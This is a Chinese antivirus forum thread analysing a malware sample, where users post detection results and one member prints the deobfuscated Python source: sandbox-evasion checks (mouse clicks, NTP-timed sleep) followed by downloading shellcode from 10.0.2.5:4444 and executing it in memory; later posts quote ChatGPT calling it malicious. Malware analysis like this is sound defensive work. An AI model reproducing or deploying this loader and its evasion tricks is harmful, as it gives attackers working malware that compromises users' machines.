楼主: python无名氏
收起左侧

[病毒样本] 连接网络的还混淆代码的屑

  [复制链接]
761773275
发表于 2023-1-31 19:25:39 | 显示全部楼层
ATC
  1. 高级威胁防护阻止了一个恶意进程。进程路径: virus.exe.
  2. 威胁名称: ATC.SuspiciousBehavior.4596B61602BFE6A6.
复制代码
aboringman
发表于 2023-1-31 19:38:09 | 显示全部楼层
  1. 2023/1/31 19:37:26        D:\测试专用\virus\virus.exe|>virus [L] Multi:Agent-BD [Trj] (0)
复制代码
GreatMOLA
发表于 2023-1-31 19:57:51 | 显示全部楼层
Norton
C杀
a27573
发表于 2023-1-31 20:50:51 | 显示全部楼层
本帖最后由 a27573 于 2023-1-31 21:06 编辑

  1. import urllib.request, string, random, ctypes
  2. import multiprocessing
  3. n_cpu_count = multiprocessing.cpu_count()
  4. if n_cpu_count >= 2:
  5.             import win32api
  6.             a = 0
  7.             b = 1
  8.             while a < b:  # 推测为鼠标点击反沙盒
  9.                         c = win32api.GetAsyncKeyState(1) # VK_LBUTTON 鼠标左键
  10.                         d = win32api.GetAsyncKeyState(2) # VK_RBUTTON 鼠标右键
  11.                         if c % 2 == 1:
  12.                                     a += 1
  13.                         if d % 2 == 1:
  14.                                     a += 1
  15.             if a >= b:
  16.                         from time import sleep
  17.                         from socket import AF_INET, SOCK_DGRAM
  18.                         import sys
  19.                         import datetime
  20.                         import time
  21.                         import socket
  22.                         import struct
  23.                         client = socket.socket(AF_INET, SOCK_DGRAM)
  24.                         client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))
  25.                         msg, address = client.recvfrom( 1024 )
  26.                         e = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)
  27.                         sleep(10)  # sleep反沙盒
  28.                         client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))
  29.                         msg, address = client.recvfrom( 1024 )
  30.                         if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - e).seconds >= 10):  # 利用ntp服务器判断是否sleep了足够时间,检测沙盒时间加速
  31.                                     def func1(s): return sum([ord(ch) for ch in s]) % 0x100
  32.                                     def func2():
  33.                                         for x in range(64):
  34.                                                             f = ''.join(random.sample(string.ascii_letters + string.digits,3))
  35.                                                             g = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
  36.                                                             for i in g:
  37.                                                                         if func1(f + i) == 92: return f + i
  38.                                     def request_http_content(domain, port):
  39.                                                 proxy_handler = urllib.request.ProxyHandler({})
  40.                                                 opener = urllib.request.build_opener(proxy_handler)
  41.                                                 urllib.request.install_opener(opener)
  42.                                                 req = urllib.request.Request("http://" + domain + ":" + str(port) + "/" + func2(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})
  43.                                                 try:
  44.                                                             r = urllib.request.urlopen(req)
  45.                                                             try:
  46.                                                                         if int(r.info()["Content-Length"]) > 100000: return r.read()
  47.                                                                         else: return ''
  48.                                                             except: return r.read()
  49.                                                 except urllib.request.URLError:
  50.                                                             return ''
  51.                                     def exec_shellcode(payload):
  52.                                                 if payload != "":
  53.                                                             buf = bytearray(payload)
  54.                                                             base_address = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(buf)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
  55.                                                             c_char_array = (ctypes.c_char * len(buf)).from_buffer(buf)
  56.                                                             ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(base_address),c_char_array, ctypes.c_int(len(buf)))
  57.                                                             handle_thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(base_address),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
  58.                                                             ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle_thread),ctypes.c_int(-1))
  59.                                     payload = ''
  60.                                     payload = request_http_content("10.0.2.5", 4444)
  61.                                     exec_shellcode(payload)
复制代码

你看看,这样是不是就简单易懂,一目了然了?

从10.0.2.5:4444加上一个满足简单hash的4位字符串的url里下载了一段shellcode,创建线程并运行

然后这个10.0.2.5是局域网地址,说明这个脚本要配合其他组件才能运行




非常常见的downloader了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2人气 +4 收起 理由
EternalHibiki + 3 感谢解答: )
wwwab + 1 太强了!!!

查看全部评分

wangrui6666
发表于 2023-2-1 09:02:50 | 显示全部楼层
杰伦J时代 发表于 2023-1-31 17:31
还是这个版本好,界面简洁,看着舒适,就是听说这个版本没有kis21.9引擎新啊

是啊,一点没错,我每天都会上365看看有没有新版本发布呢,哈哈
python无名氏
 楼主| 发表于 2023-2-1 10:28:19 | 显示全部楼层
本帖最后由 python无名氏 于 2023-2-1 10:29 编辑
a27573 发表于 2023-1-31 20:50
你看看,这样是不是就简单易懂,一目了然了?

从10.0.2.5:4444加上一个满足简单hash的4位字符串的url ..
谢谢大佬!
wwwab
发表于 2023-2-10 14:07:35 | 显示全部楼层
刚刚考了考ChatGPT,然后它反复对我说请不要在你的计算机上运行这段代码

这是一段恶意脚本,它的目的是在 Windows 系统上执行恶意操作。它可以监测鼠标和键盘的状态,并通过向指定的 URL 发送请求以获取恶意代码。然后,它会加载并执行这些恶意代码。请不要在你的计算机上运行这段代码。
This code is a malicious script. It appears to contain some functionalities that can be considered as harmful. For example, it checks if there are at least two CPU cores available, and if so, it waits for a certain key combination to be pressed. If the key combination is pressed, it performs a number of actions, including sending an NTP request and downloading data from a server using a custom URL. The data downloaded from the server is then executed by allocating memory in the process and copying the data into it. This code may cause harm to your computer or network and it is not recommended to run it.
wwwab
发表于 2023-2-10 14:19:51 | 显示全部楼层

From ChatGPT

This code appears to be malicious, as it uses multiple libraries and techniques that are commonly used in malicious software. For example, it uses the win32api library to monitor keyboard events, urllib to make HTTP requests to remote servers, and ctypes to allocate memory in the Windows operating system. The code also uses random number generation, string manipulation, and network communication, which could potentially be used to gather sensitive information or compromise the security of the host system. I would advise against executing this code on any systems that you control.
This code appears to be malicious in nature. It's checking the number of CPU cores and, if the number is greater than or equal to 2, it uses the win32api module to monitor keyboard events. If certain conditions are met, the code opens a socket connection and sends a message to a specified network time protocol server. This is likely part of a malicious payload that is attempting to gain information or execute actions on the targeted system. It's not recommended to run this code or allow it to execute on your system.

python无名氏
 楼主| 发表于 2023-2-10 19:46:39 | 显示全部楼层
wwwab 发表于 2023-2-10 14:07
刚刚考了考ChatGPT,然后它反复对我说请不要在你的计算机上运行这段代码

求ChatGPT的token(key)我整了好久都没搞到,听说要钱,还得弄个国外手机号,也要钱...第一次做伸手党,望批准
wwwab
发表于 2023-2-10 19:57:21 | 显示全部楼层
python无名氏 发表于 2023-2-10 19:46
求ChatGPT的token(key)我整了好久都没搞到,听说要钱,还得弄个国外手机号,也要钱...第一次做伸手 ...

不行啊,我只有一个好不容易搞来的账号,调用api貌似是按照字数收费,每个账号只有18美金的体验额度用完就要充钱而且还很麻烦,有人没几天就花完用光了额度
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 14:22 , Processed in 0.101885 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表